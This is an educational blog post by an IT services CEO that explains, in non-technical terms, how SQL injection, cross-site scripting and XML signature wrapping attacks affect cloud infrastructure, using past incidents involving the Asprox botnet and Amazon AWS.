Malware Injection Attacks

The Types of Malware Injection Attacks

The Cloud Computing Infrastructure is susceptible to Malware Injection Attacks. In these instances, the Cyber attacker creates a malicious application and injects it into the SaaS, PaaS and the IaaS, respectively. Once the injection is completed, the malicious module is executed as one of the valid instances running in the Cloud Infrastructure. From  this point, the Cyber attacker can then launch any sort of attack, such as covert eavesdropping, data manipulation, and data theft.

It is important to note that amongst all of the malware injection attacks, it is the SQL Injection Attack and the Cross-Site Scripting attack are the two most common forms that can be launched against a Cloud Computing Infrastructure.

The SQL Injection Attack

SQL injections are a type of malware injection attack that targets SQL servers in the Cloud Infrastructure that run vulnerable database applications. Thus, the Cyber attacker exploits the vulnerabilities of the web servers, and from there, injects a malicious code in order to circumvent the login credentials and gain unauthorized access to the backend databases.

If this is successful, the Cyber attacker can then further manipulate the contents of the SQL Server databases; retrieve confidential data; remotely execute system commands; or even take control of the web server for further criminal activities.  The SQL injection attacks can also be launched by a botnet.

For example, the Asprox botnet used a thousand bots that were equipped with an SQL injection kit to fire an SQL injection attack (SOURCE:  1). The bots first sent encoded SQL queries containing the exploit payload to Google for searching web servers that ran the ASP.net framework.

Then, the bots started executed a SQL injection attack against the web sites returned from those queries. In the end, over 6 million URLs belonging to 153,000 different web sites that were hosted on various Cloud Infrastructures were impacted the Asprox botnet.

Cross Site Scripting (XSS)

Cross Site Scripting attacks are a type of malware injection attack where the Cyber attacker injects malicious scripts, such as JavaScript, VBScript, ActiveX, HTML, and Flash, into a vulnerable dynamic web page in order  to execute these various scripts on the victim’s web browser.  Afterwards, the Cyber attacker could then steal the session cookie used for authorization for the purposes of accessing the victim’s account or tricking the victim into clicking a malicious link.

For example,  Cyber researchers recently in Germany have successfully demonstrated an XSS attack against the Amazon AWS Cloud Computing Platform. The vulnerability in the Amazon store allowed the team to hijack an AWS session and gain successful access to all of the customer data (this included  authentication data, tokens, and plain text passwords). (SOURCE: 2).

The Wrapping Attack

Wrapping attacks are a type of malware injection that make use of the XML signature wrapping (or XML rewriting) to exploit a weakness when web servers validate signed requests. This type of Cyber-attack is accomplished during the translation of SOAP messages between a legitimate user and the web server.

The Cyber attacker embeds a bogus element (the wrapper) into the message structure, moves the original message body under the wrapper, and replaces the content of the message with malicious code.  From here, it is then sent to then to the server hosted on the Cloud Computing Infrastructure.

Since the original message body is still valid, the server will then be tricked into authorizing the message that has actually been altered. As a result, the Cyber attacker is then able to gain unauthorized access to protected resources. From here, the illegal operations can then proceed.

Since cloud users normally request services from cloud computing service providers through a web browser, wrapping attacks can cause damage to cloud systems as well. Amazon’s EC2 was discovered to be vulnerable to wrapping attacks in 2008 (SOURCE: 3).

The research showed that the EC2 had a weakness in the SOAP message security validation mechanism. A signed SOAP request of a legitimate user could be intercepted and modified. As a result, the Cyber attacker could then take unprivileged actions on victim’s accounts in the Cloud Environment.

By using the XML signature wrapping technique, the Cyber researchers also demonstrated an account hijacking attack that exploited a vulnerability in the Amazon AWS (SOURCE: 4). By altering authorized digitally signed SOAP messages, the Cyber researchers were then able to obtain unauthorized access to a customer’s account. They could also delete and create new images on the customer’s EC2 instance, and also perform other administrative tasks.

Conclusions

Now that you’ve learned about malware injection attacks our next blog will examine other types of threat variants to a Cloud Infrastructure.

Sources

  1. N. Provos, M. A. Rajab, and P. Mavrommatis, “Cybercrime 2.0: When the Cloud Turns Dark,” ACM Communications, Vol. 52, No. 4, pp. 42–47, 2009.
  2. Researchers Demo Cloud Security Issue With Amazon AWS Attack, October 2011.                 http://www.pcworld.idg.com.au/article/405419/researchers_demo_cloud_security_issue_amaz on_aw s_attack/
  3. N. Gruschka and L. L. Iacono, “Vulnerable Cloud: SOAP Message Security Validation Revisited,”          IEEE International Conference on Web Services, Los Angeles, 2009.
  4. Researchers Demo Cloud Security Issue With Amazon AWS Attack, October 2011.                                                            http://www.pcworld.idg.com.au/article/405419/researchers_demo_cloud_security_issue_amaz on_aw s_attack/

About Chad Lauterbach

CEO at Be Structured Technology Group, Inc. a Los Angeles based provider of Managed IT Services for small business. I desire to help small businesses better utilize technology by assisting in high level planning to make sure that new systems will benefit them both operationally and financially. I am careful to implement and support systems using industry best practices.